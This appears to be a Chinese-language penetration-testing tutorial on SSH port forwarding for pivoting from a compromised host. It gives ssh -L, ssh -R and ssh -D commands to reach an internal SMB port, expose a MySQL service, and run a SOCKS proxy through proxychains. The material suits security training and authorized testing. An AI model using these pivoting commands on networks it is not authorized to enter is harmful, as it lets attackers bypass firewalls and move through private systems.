一、SSH 端口转发篇

1、基于ssh实现本地端口转发，外网同内网主机间的通信

kali 已拿下 server1 的 ssh 权限，server1 和 server2 之间可以直接通信，且已经拿下 server2，kali 无法直接和 server2 通信 。通过端口转发，实现 kali 和 server 2 的直接通信

1.1、需要在 attack kali 上配置的内容

配置完成后，访问 kali 445 端口的流量将通过 ssh 转发到 server2 的 445 端口上

# 在 kali 上配置端口转发，`-N` 不发送指令 `-L` 设置端口转发
# ssh -N -L localip:localport:remoteip:remote:port username@remoteip
ssh -N -L 0.0.0.0:445:192.168.1.10:445 [email protected]

2、基于ssh实现远程端口转发，通过连接外网的端口，将本地端口转发出去

场景：本地主机可以无限制访问互联网，互联网只能访问防火墙映射后的部分端口
即： kali 无法访问 直接访问内网的其它端口。通过端口转发将其它端口转发到公网
server1 可以访问 kali 任意端口，kali 无法访问 server1 上的监听本地端口的mysql 服务

2.1、所需配置内容

kali 上需要事先监听用于转发的端口:2221

# ssh -N -R remote_ip:remote_forward_port:local_ip:local_port username@remote_ip
ssh -N -R 202.101.1.20:2221:127.0.0.1:3306 [email protected]

3、使用ssh作为代理，漫游内网

防火墙没有限制进出流量
kali 将本地 socks 服务器的流量，通过 ssh 转发到 server1 上，将 server1 作为代理服务器

3.1 所需的配置内容

• kali 上面

echo "socks5 127.0.0.1 8080 " >> /etc/proxychains.conf
# -D 在本地创建 socks 代理服务器
# ssh -N -D local_ip:local_port username@remote_ip
sudo ssh -N -D 127.0.0.1:8080 [email protected]